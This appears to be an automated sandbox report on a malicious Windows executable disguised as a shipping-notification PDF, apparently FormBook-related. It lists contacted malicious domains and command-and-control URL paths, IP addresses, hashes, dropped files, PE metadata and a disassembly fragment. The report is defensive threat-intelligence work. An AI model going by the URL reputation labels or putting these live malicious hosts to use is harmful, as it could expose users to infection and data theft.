                                        http://www.softillery.info/05bk/?3h-p=7slq6roGbUYIGCZK/AHLAj192Fgd/VphPEARDFaBZgyILhyhf/dU1Jg1HH64YML39LGaxm9NI1GZWNYUnLUXyXLdbmUNBKZzgEadXvwwUw5uXrkOz5o90nGwS6h8GF9GBt2NTtUZfNeM&yP=MxXHdlzpQrd0false
                                        • Avira URL Cloud: safe
                                        		unknown

                                        URLs from Memory and Binaries

                                        NameSourceMaliciousAntivirus DetectionReputation
                                        https://duckduckgo.com/chrome_newtabsort.exe, 0000000B.00000003.1803504970.000000000819D000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://dts.gnpge.comfirefox.exe, 0000000E.00000002.1911274268.00000000366D6000.00000004.80000000.00040000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://duckduckgo.com/ac/?q=sort.exe, 0000000B.00000003.1803504970.000000000819D000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://www.google.com/images/branding/product/ico/googleg_lodp.icosort.exe, 0000000B.00000003.1803504970.000000000819D000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=sort.exe, 0000000B.00000003.1803504970.000000000819D000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=sort.exe, 0000000B.00000003.1803504970.000000000819D000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://www.ecosia.org/newtab/sort.exe, 0000000B.00000003.1803504970.000000000819D000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://ac.ecosia.org/autocomplete?q=sort.exe, 0000000B.00000003.1803504970.000000000819D000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchsort.exe, 0000000B.00000003.1803504970.000000000819D000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.antura.partners/sk-logabpstatus.php?a=K3ZvUk8rMHZ6cWJBTjJIV04zS2R2RnBlczJZWldicnJFSmlpMmpsort.exe, 0000000B.00000002.3147958771.00000000066D0000.00000004.00000800.00020000.00000000.sdmp, AVyNLNHPrma.exe, 0000000C.00000002.3145117742.0000000003456000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.1911274268.00000000366D6000.00000004.80000000.00040000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.exhibitarrange.shopAVyNLNHPrma.exe, 0000000C.00000002.3146774474.0000000005370000.00000040.80000000.00040000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=sort.exe, 0000000B.00000003.1803504970.000000000819D000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.antura.partners/px.js?ch=1sort.exe, 0000000B.00000002.3147958771.00000000066D0000.00000004.00000800.00020000.00000000.sdmp, AVyNLNHPrma.exe, 0000000C.00000002.3145117742.0000000003456000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.1911274268.00000000366D6000.00000004.80000000.00040000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.antura.partners/px.js?ch=2sort.exe, 0000000B.00000002.3147958771.00000000066D0000.00000004.00000800.00020000.00000000.sdmp, AVyNLNHPrma.exe, 0000000C.00000002.3145117742.0000000003456000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.1911274268.00000000366D6000.00000004.80000000.00040000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown

                                        World Map of Contacted IPs

                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs

                                        Public IPs

                                        IPDomainCountryFlagASNASN NameMalicious
                                        13.248.169.48
                                        		www.sapatarias.onlineUnited States
                                        		16509AMAZON-02USfalse
                                        208.91.197.27
                                        		www.antura.partnersVirgin Islands (BRITISH)
                                        		40034CONFLUENCE-NETWORK-INCVGfalse
                                        43.154.104.247
                                        		www.nmh6.siteJapan4249LILLY-ASUSfalse
                                        38.180.87.102
                                        		www.skystargazeguide.storeUnited States
                                        		174COGENT-174USfalse
                                        3.33.130.190
                                        		softillery.infoUnited States
                                        		8987AMAZONEXPANSIONGBfalse
                                        162.0.238.238
                                        		www.priunit.onlineCanada
                                        		22612NAMECHEAP-NETUSfalse
                                        34.76.205.124
                                        		www.exhibitarrange.shopUnited States
                                        		15169GOOGLEUSfalse

                                        General Information

                                        Joe Sandbox version:41.0.0 Charoite
                                        Analysis ID:1520196
                                        Start date and time:2024-09-27 06:33:13 +02:00
                                        Joe Sandbox product:CloudBasic
                                        Overall analysis duration:0h 8m 50s
                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Cookbook file name:default.jbs
                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                        Run name:Run with higher sleep bypass
                                        Number of analysed new started processes analysed:17
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:2
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Sample name:shipping notification_pdf.exe
                                        Detection:MAL
                                        Classification:mal100.troj.spyw.evad.winEXE@7/2@11/7
                                        EGA Information:
                                        • Successful, ratio: 80%
                                        HCA Information:
                                        • Successful, ratio: 89%
                                        • Number of executed functions: 39
                                        • Number of non-executed functions: 316
                                        Cookbook Comments:
                                        • Found application associated with file extension: .exe
                                        • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

                                        Warnings

                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                                        • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                        • Not all processes where analyzed, report is missing behavior information
                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                        • VT rate limit hit for: shipping notification_pdf.exe

                                        Simulations

                                        Behavior and APIs

                                        TimeTypeDescription
                                        01:53:16API Interceptor5467288x Sleep call for process: sort.exe modified

                                        Joe Sandbox View / Context

                                        IPs

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        13.248.169.48RN# D7521-RN-00353 REV-2.exeGet hashmaliciousFormBookBrowse
                                        • www.luxe.guru/s9un/
                                        gvyO903Xmm.exeGet hashmaliciousFormBookBrowse
                                        • www.4it.services/bopi/?_FQ8hB=RB9p3Jfq9ZvBoyq8+0+Fmui7HG2krdiIZXqgFfVf6IzsfIQ1CkKG0m46V1pTk3XN6PXG&qL3=eXSlCFXxoF
                                        CITA#U00c7#U00c3O.exeGet hashmaliciousFormBookBrowse
                                        • www.dyme.tech/h7lb/
                                        ADNOC requesting RFQ.exeGet hashmaliciousFormBookBrowse
                                        • www.smilechat.shop/ih4n/
                                        PO For Bulk Order.exeGet hashmaliciousFormBookBrowse
                                        • www.sapatarias.online/ep7t/
                                        CYTAT.exeGet hashmaliciousFormBookBrowse
                                        • www.dyme.tech/h7lb/
                                        UMOWA_PD.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                        • www.invicta.world/tcs6/
                                        RFQ urrgently.exeGet hashmaliciousFormBookBrowse
                                        • www.smilechat.shop/ih4n/
                                        inquiry and prices EO-230807.exeGet hashmaliciousFormBookBrowse
                                        • www.luxe.guru/s9un/
                                        HBLAWBP.LISTCOC & INV.exeGet hashmaliciousFormBookBrowse
                                        • www.luxe.guru/s9un/
                                        208.91.197.27Product Data Specifications_PDF.exeGet hashmaliciousFormBookBrowse
                                        • www.kevin-torkelson.info/gekb/?Z0=5z2j4JvjBCmnxDGlKBgzTD3+HUD/dd2fumCOi9/ZiiqSem4bSPmiTeLNTUQRFOSACWspsHfkjQi2G8tl0kaRWA67inr6j8yvx+6PXqz9iyZ5+RA70tZ4RmMUT5lyJ2S3VdPbvKQVdTVJ&fRr0=tfAptZ
                                        PO5118000306 pdf.exeGet hashmaliciousFormBookBrowse
                                        • www.brainchainllc.online/x7gn/
                                        QlHhDu2uh1.exeGet hashmaliciousFormBookBrowse
                                        • www.kevin-torkelson.info/gekb/?vlJ0J=5z2j4JvjBCmnxDGlKBgzTD3+HUD/dd2fumCOi9/ZiiqSem4bSPmiTeLNTUQRFOSACWspsHfkjQi2G8tl0kaRWHr5s1DFjeSN2u6PXpPjiBw39CM7/tZ+YHIUNMByc2S3D5vP9Ng=&HDJP=Pnl8G6jPyrn
                                        Amended Proforma #U2013 SMWD5043.exeGet hashmaliciousFormBookBrowse
                                        • www.inastra.online/55bv/
                                        AWB_5771388044 Documenti di spedizione.exeGet hashmaliciousFormBookBrowse
                                        • www.palcoconnector.net/c45k/
                                        RECIEPT.PDF.exeGet hashmaliciousFormBookBrowse
                                        • www.yourhomecopilot.online/jdoy/
                                        LgzpILNkS2.exeGet hashmaliciousFormBookBrowse
                                        • www.willtriallawyers.net/ccld/
                                        SecuriteInfo.com.W32.AutoIt.AQ.gen.Eldorado.22170.7541.exeGet hashmaliciousFormBookBrowse
                                        • www.kevin-torkelson.info/gekb/?6JAhxhQ=5z2j4JvjBCmnxDGlKBgzTD3+HUD/dd2fumCOi9/ZiiqSem4bSPmiTeLNTUQRFOSACWspsHfkjQi2G8tl0kaRXHq/o1z6msqN7u+hXpr/iyZ69h0d/sxUWlEUDMB6KnnnBA==&In3=AzvpidDp
                                        2nd RFQ TECMARKQATAR PO33218_PDF.exeGet hashmaliciousFormBookBrowse
                                        • www.kevin-torkelson.info/gekb/?mnShvP=5z2j4JvjBCmnxDGmURgdSy3xK1+MU+efumCOi9/ZiiqSem4bSPmiTeLNTUQRFOSACWspsHfkjQi2G8tl0kaRExD4swvGjZDWs+2yQq3jiVda6yM//tNBSW8=&Cbj=nB9LWdWpMT7tUBt
                                        ncOLm62YLB.exeGet hashmaliciousFormBookBrowse
                                        • www.palcoconnector.net/c45k/
                                        43.154.104.247RFQ - HTS45785-24-0907I000.exeGet hashmaliciousFormBookBrowse
                                        • www.nmh6.site/8qne/

                                        Domains

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        www.sapatarias.onlinePO For Bulk Order.exeGet hashmaliciousFormBookBrowse
                                        • 13.248.169.48
                                        New Purchase Order.exeGet hashmaliciousFormBookBrowse
                                        • 13.248.169.48
                                        www.nmh6.siteRFQ - HTS45785-24-0907I000.exeGet hashmaliciousFormBookBrowse
                                        • 43.154.104.247

                                        ASNs

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        COGENT-174UShttp://rmdown.downrenminbank.cc/Get hashmaliciousUnknownBrowse
                                        • 149.104.35.170
                                        http://v884.cc/Get hashmaliciousUnknownBrowse
                                        • 154.55.135.62
                                        http://hbyczyz.com/xrrGet hashmaliciousUnknownBrowse
                                        • 38.54.26.75
                                        http://aprackspace.serveusers.com/Get hashmaliciousUnknownBrowse
                                        • 143.244.221.78
                                        https://telegram.tikkf.top/Get hashmaliciousUnknownBrowse
                                        • 38.45.123.42
                                        http://rmdown.newrenminbankcn.cc/Get hashmaliciousUnknownBrowse
                                        • 149.104.35.171
                                        http://pldw.peoplebankweb.cc/Get hashmaliciousUnknownBrowse
                                        • 149.104.35.171
                                        http://web.teleglams.top/Get hashmaliciousUnknownBrowse
                                        • 154.44.30.138
                                        EXTERNAL Gina Wren shared Inv-00811 With you.msgGet hashmaliciousUnknownBrowse
                                        • 192.240.97.170
                                        https://www.filemail.com/d/qyopmnowcnooqddGet hashmaliciousUnknownBrowse
                                        • 192.240.97.170
                                        AMAZON-02UShttps://loudsc-3ef0.rryibioccsgteh.workers.dev/Get hashmaliciousHTMLPhisherBrowse
                                        • 13.224.189.65
                                        http://tokenpblket.com/Get hashmaliciousHTMLPhisherBrowse
                                        • 108.138.7.34
                                        http://quickmailservice331516277272772.weebly.com/Get hashmaliciousUnknownBrowse
                                        • 52.26.92.110
                                        http://instagram.totalh.net/Get hashmaliciousUnknownBrowse
                                        • 52.67.222.115
                                        http://sjhjjffhhh2024.weebly.com/Get hashmaliciousHTMLPhisherBrowse
                                        • 52.214.161.17
                                        http://superb-baklava-10ac5b.netlify.app/Get hashmaliciousTechSupportScamBrowse
                                        • 3.70.101.28
                                        https://bacure-4b4d.rmhsimuerere.workers.dev/Get hashmaliciousHTMLPhisherBrowse
                                        • 13.224.189.91
                                        http://bt-103187.weeblysite.com/Get hashmaliciousHTMLPhisherBrowse
                                        • 35.160.133.228
                                        http://ads-verification-for-pay.vercel.app/Get hashmaliciousHTMLPhisherBrowse
                                        • 76.76.21.93
                                        https://metamaskinc.blogspot.in/Get hashmaliciousUnknownBrowse
                                        • 108.138.26.31
                                        LILLY-ASUShttp://tikseller.net/Get hashmaliciousUnknownBrowse
                                        • 43.134.185.182
                                        https://us-usps-loi.top/updateGet hashmaliciousUnknownBrowse
                                        • 43.157.114.206
                                        https://tkmallj.top/Get hashmaliciousUnknownBrowse
                                        • 43.128.78.228
                                        https://ebayo167.top/Get hashmaliciousUnknownBrowse
                                        • 43.159.108.19
                                        https://us-usps-bkisbjlt.xyz/update/Get hashmaliciousUnknownBrowse
                                        • 43.157.114.206
                                        https://us-usps-bkisboju.xyz/update/Get hashmaliciousUnknownBrowse
                                        • 43.157.114.206
                                        https://us-usps-kgg.top/update/Get hashmaliciousUnknownBrowse
                                        • 43.157.114.206
                                        https://us-usps-fjye.xyz/update/Get hashmaliciousUnknownBrowse
                                        • 43.157.114.206
                                        https://us-usps-kgt.top/update/Get hashmaliciousUnknownBrowse
                                        • 43.157.114.206
                                        http://WWW.LUTHERANSONLINE.COM/SHALOMICGet hashmaliciousUnknownBrowse
                                        • 43.198.114.34
                                        CONFLUENCE-NETWORK-INCVGProduct Data Specifications_PDF.exeGet hashmaliciousFormBookBrowse
                                        • 208.91.197.27
                                        PO5118000306 pdf.exeGet hashmaliciousFormBookBrowse
                                        • 208.91.197.27
                                        PO For Bulk Order.exeGet hashmaliciousFormBookBrowse
                                        • 208.91.197.27
                                        UMOWA_PD.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                        • 208.91.197.27
                                        QlHhDu2uh1.exeGet hashmaliciousFormBookBrowse
                                        • 208.91.197.27
                                        http://17ebook.comGet hashmaliciousUnknownBrowse
                                        • 208.91.196.46
                                        List of Items0001.doc.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                        • 208.91.197.27
                                        Amended Proforma #U2013 SMWD5043.exeGet hashmaliciousFormBookBrowse
                                        • 208.91.197.27
                                        AWB_5771388044 Documenti di spedizione.exeGet hashmaliciousFormBookBrowse
                                        • 208.91.197.27
                                        RECIEPT.PDF.exeGet hashmaliciousFormBookBrowse
                                        • 208.91.197.27

                                        JA3 Fingerprints

                                        No context

                                        Dropped Files

                                        No context

                                        Created / dropped Files

                                        C:\Users\user\AppData\Local\Temp\30G910fd

                                        Download File
                                        Process:C:\Windows\SysWOW64\sort.exe
                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                        Category:modified
                                        Size (bytes):196608
                                        Entropy (8bit):1.1215420383712111
                                        Encrypted:false
                                        SSDEEP:384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
                                        MD5:9A809AD8B1FDDA60760BB6253358A1DB
                                        SHA1:D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
                                        SHA-256:95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
                                        SHA-512:2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
                                        Malicious:false
                                        Reputation:moderate, very likely benign file
                                        Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                        C:\Users\user\AppData\Local\Temp\surmount

                                        Download File
                                        Process:C:\Users\user\Desktop\shipping notification_pdf.exe
                                        File Type:data
                                        Category:modified
                                        Size (bytes):286720
                                        Entropy (8bit):7.993140420185179
                                        Encrypted:true
                                        SSDEEP:6144:JnC1QgqO9zH1kU2eBp0ISQX6K3PSGYWeVw:JnCHOVbINq6hYWAw
                                        MD5:E81BD67B42F31548356F2E23FA82E1C4
                                        SHA1:71CA0479ED0C05F0A8931FB9750A95D54DB4EDB0
                                        SHA-256:CE199A4E302B7F4A8F12F7A2A8065B8ADCB8EC74F6DD354BFAD2A72D0C8C9E1D
                                        SHA-512:7FF55044CE78C8FFC40B66658349C99936D9A96973371C0CD3D65B1832D238950F72A045D6578DB68835AF962BE1213067E4C371CC3ED229466519F53DD0A3D1
                                        Malicious:false
                                        Reputation:low
                                        Preview:.....9IFU..N...y.FF...:A...JKG22LFE3FEXFA79IFUJJKG22LFE3F.XFA9&.HU.C.f.3..dg.,+f1EV.44'j(&\\#2eQ#e*3/.P'f...k*]V)hH>LaXFA79IF,KC.zRU.{%T.x8!.-..o*-.]...z%T._...Y...#)#zRU.FE3FEXFAg|IF.KKK....FE3FEXFA.9KG^KAKG|6LFE3FEXFA'-IFUZJKGR6LFEsFEHFA7;IFSJJKG22L@E3FEXFA7YMFUHJKG22LDEs.EXVA7)IFUJZKG"2LFE3FUXFA79IFUJJKG22LFE3FEXFA79IFUJJKG22LFE3FEXFA79IFUJJKG22LFE3FEXFA79IFUJJKG22LFE3FEXFA79IFUJJKG22LFE3FEXFA79IFUJJKG22LFE3FEXFA79IFUJJKiFW42E3F..BA7)IFU.NKG"2LFE3FEXFA79IFuJJ+G22LFE3FEXFA79IFUJJKG22LFE3FEXFA79IFUJJKG22LFE3FEXFA79IFUJJKG22LFE3FEXFA79IFUJJKG22LFE3FEXFA79IFUJJKG22LFE3FEXFA79IFUJJKG22LFE3FEXFA79IFUJJKG22LFE3FEXFA79IFUJJKG22LFE3FEXFA79IFUJJKG22LFE3FEXFA79IFUJJKG22LFE3FEXFA79IFUJJKG22LFE3FEXFA79IFUJJKG22LFE3FEXFA79IFUJJKG22LFE3FEXFA79IFUJJKG22LFE3FEXFA79IFUJJKG22LFE3FEXFA79IFUJJKG22LFE3FEXFA79IFUJJKG22LFE3FEXFA79IFUJJKG22LFE3FEXFA79IFUJJKG22LFE3FEXFA79IFUJJKG22LFE3FEXFA79IFUJJKG22LFE3FEXFA79IFUJJKG22LFE3FEXFA79IFUJJKG22LFE3FEXFA79IFUJJKG22LFE3FEXFA79IFUJJKG22LFE3FEXFA79IFUJJKG22LFE3F

                                        Static File Info

                                        General

                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Entropy (8bit):7.540601924791697
                                        TrID:
                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                        • DOS Executable Generic (2002/1) 0.02%
                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                        File name:shipping notification_pdf.exe
                                        File size:1'359'839 bytes
                                        MD5:d9e239c79f89ec481ec939d7f784c89e
                                        SHA1:9b83acaa385abba92e8d3566479578af4fcdd954
                                        SHA256:0ef342eee9167ec78306dabdd82b0c41f34f1e3ed7d35676a602735497d72101
                                        SHA512:c20de20a26b45db12e307f0d78111457a89f86dd0886f8d18105a684872632b00f675da366e8e9625cd6c5107352e9c2c5707f8d572c5c065eb21b9e38700209
                                        SSDEEP:24576:uRmJkcoQricOIQxiZY1iaCw0rBo3y2A8NTNeSWvqVSFAit6xSnAU:7JZoQrbTFZY1iaCw0ypTNcNSvit6ql
                                        TLSH:4255F222F5D68076C1B323B19E7EF7AA963D79360326D29B37C81D211E605416B3A733
                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................1b.......P.).....Q.......y.......i..........}....N.......d.......`.......m.......g.....Rich............PE..L..

                                        File Icon

                                        Icon Hash:1733312925935517

                                        Static PE Info

                                        General

                                        Entrypoint:0x4165c1
                                        Entrypoint Section:.text
                                        Digitally signed:false
                                        Imagebase:0x400000
                                        Subsystem:windows gui
                                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                        DLL Characteristics:TERMINAL_SERVER_AWARE
                                        Time Stamp:0x4F25BAEC [Sun Jan 29 21:32:28 2012 UTC]
                                        TLS Callbacks:
                                        CLR (.Net) Version:
                                        OS Version Major:5
                                        OS Version Minor:0
                                        File Version Major:5
                                        File Version Minor:0
                                        Subsystem Version Major:5
                                        Subsystem Version Minor:0
                                        Import Hash:d3bf8a7746a8d1ee8f6e5960c3f69378

                                        Entrypoint Preview

                                        Instruction
                                        call 00007F6EB87CFB6Bh
                                        jmp 00007F6EB87C69DEh
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        push ebp
                                        mov ebp, esp
                                        push edi
                                        push esi
                                        mov esi, dword ptr [ebp+0Ch]
                                        mov ecx, dword ptr [ebp+10h]
                                        mov edi, dword ptr [ebp+08h]
                                        mov eax, ecx
                                        mov edx, ecx
                                        add eax, esi
                                        cmp edi, esi
                                        jbe 00007F6EB87C6B5Ah
                                        cmp edi, eax
                                        jc 00007F6EB87C6CF6h
                                        cmp ecx, 00000080h
                                        jc 00007F6EB87C6B6Eh
                                        cmp dword ptr [004A9724h], 00000000h
                                        je 00007F6EB87C6B65h
                                        push edi
                                        push esi
                                        and edi, 0Fh
                                        and esi, 0Fh
                                        cmp edi, esi
                                        pop esi
                                        pop edi
                                        jne 00007F6EB87C6B57h
                                        jmp 00007F6EB87C6F32h
                                        test edi, 00000003h
                                        jne 00007F6EB87C6B66h
                                        shr ecx, 02h
                                        and edx, 03h
                                        cmp ecx, 08h
                                        jc 00007F6EB87C6B7Bh
                                        rep movsd
                                        jmp dword ptr [00416740h+edx*4]
                                        mov eax, edi
                                        mov edx, 00000003h
                                        sub ecx, 04h
                                        jc 00007F6EB87C6B5Eh
                                        and eax, 03h
                                        add ecx, eax
                                        jmp dword ptr [00416654h+eax*4]
                                        jmp dword ptr [00416750h+ecx*4]
                                        nop
                                        jmp dword ptr [004166D4h+ecx*4]
                                        nop
                                        inc cx
                                        add byte ptr [eax-4BFFBE9Ah], dl
                                        inc cx
                                        add byte ptr [ebx], ah
                                        ror dword ptr [edx-75F877FAh], 1
                                        inc esi
                                        add dword ptr [eax+468A0147h], ecx
                                        add al, cl
                                        jmp 00007F6EBAC3F357h
                                        add esi, 03h
                                        add edi, 03h
                                        cmp ecx, 08h
                                        jc 00007F6EB87C6B1Eh
                                        rep movsd
                                        jmp dword ptr [00000000h+edx*4]

                                        Rich Headers

                                        Programming Language:
                                        • [ C ] VS2010 SP1 build 40219
                                        • [C++] VS2010 SP1 build 40219
                                        • [ C ] VS2008 SP1 build 30729
                                        • [IMP] VS2008 SP1 build 30729
                                        • [ASM] VS2010 SP1 build 40219
                                        • [RES] VS2010 SP1 build 40219
                                        • [LNK] VS2010 SP1 build 40219

                                        Data Directories

                                        NameVirtual AddressVirtual Size Is in Section
                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x8d41c0x154.rdata
                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xab0000x9328.rsrc
                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IAT0x820000x844.rdata
                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                        Sections

                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                        .text0x10000x8061c0x8080061ffce4768976fa0dd2a8f6a97b1417aFalse0.5583182605787937data6.684690148171278IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                        .rdata0x820000xdfc00xe0000354bc5f2376b5e9a4a3ba38b682dff1False0.36085728236607145data4.799741132252136IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        .data0x900000x1a7580x68008033f5a38941b4685bc2299e78f31221False0.15324519230769232data2.1500715391677487IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                        .rsrc0xab0000x93280x9400495451d7eb8326bd9fa2714869ea6de8False0.49002322635135137data5.541804843154628IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                        Resources

                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                        RT_ICON0xab5c80x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                        RT_ICON0xab6f00x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                        RT_ICON0xab8180x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                        RT_ICON0xab9400x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishGreat Britain0.48109756097560974
                                        RT_ICON0xabfa80x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishGreat Britain0.5672043010752689
                                        RT_ICON0xac2900x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishGreat Britain0.6418918918918919
                                        RT_ICON0xac3b80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishGreat Britain0.7044243070362474
                                        RT_ICON0xad2600x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishGreat Britain0.8077617328519856
                                        RT_ICON0xadb080x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishGreat Britain0.5903179190751445
                                        RT_ICON0xae0700x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishGreat Britain0.5503112033195021
                                        RT_ICON0xb06180x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishGreat Britain0.6050656660412758
                                        RT_ICON0xb16c00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishGreat Britain0.7553191489361702
                                        RT_MENU0xb1b280x50dataEnglishGreat Britain0.9
                                        RT_DIALOG0xb1b780xfcdataEnglishGreat Britain0.6507936507936508
                                        RT_STRING0xb1c780x530dataEnglishGreat Britain0.33960843373493976
                                        RT_STRING0xb21a80x690dataEnglishGreat Britain0.26964285714285713
                                        RT_STRING0xb28380x4d0dataEnglishGreat Britain0.36363636363636365
                                        RT_STRING0xb2d080x5fcdataEnglishGreat Britain0.3087467362924282
                                        RT_STRING0xb33080x65cdataEnglishGreat Britain0.34336609336609336
                                        RT_STRING0xb39680x388dataEnglishGreat Britain0.377212389380531
                                        RT_STRING0xb3cf00x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishUnited States0.502906976744186
                                        RT_GROUP_ICON0xb3e480x84dataEnglishGreat Britain0.6439393939393939
                                        RT_GROUP_ICON0xb3ed00x14dataEnglishGreat Britain1.15
                                        RT_GROUP_ICON0xb3ee80x14dataEnglishGreat Britain1.25
                                        RT_GROUP_ICON0xb3f000x14dataEnglishGreat Britain1.25
                                        RT_VERSION0xb3f180x19cdataEnglishGreat Britain0.5339805825242718
                                        RT_MANIFEST0xb40b80x26cASCII text, with CRLF line terminatorsEnglishUnited States0.5145161290322581

                                        Imports

                                        DLLImport
                                        WSOCK32.dll__WSAFDIsSet, setsockopt, ntohs, recvfrom, sendto, htons, select, listen, WSAStartup, bind, closesocket, connect, socket, send, WSACleanup, ioctlsocket, accept, WSAGetLastError, inet_addr, gethostbyname, gethostname, recv
                                        VERSION.dllVerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW
                                        WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
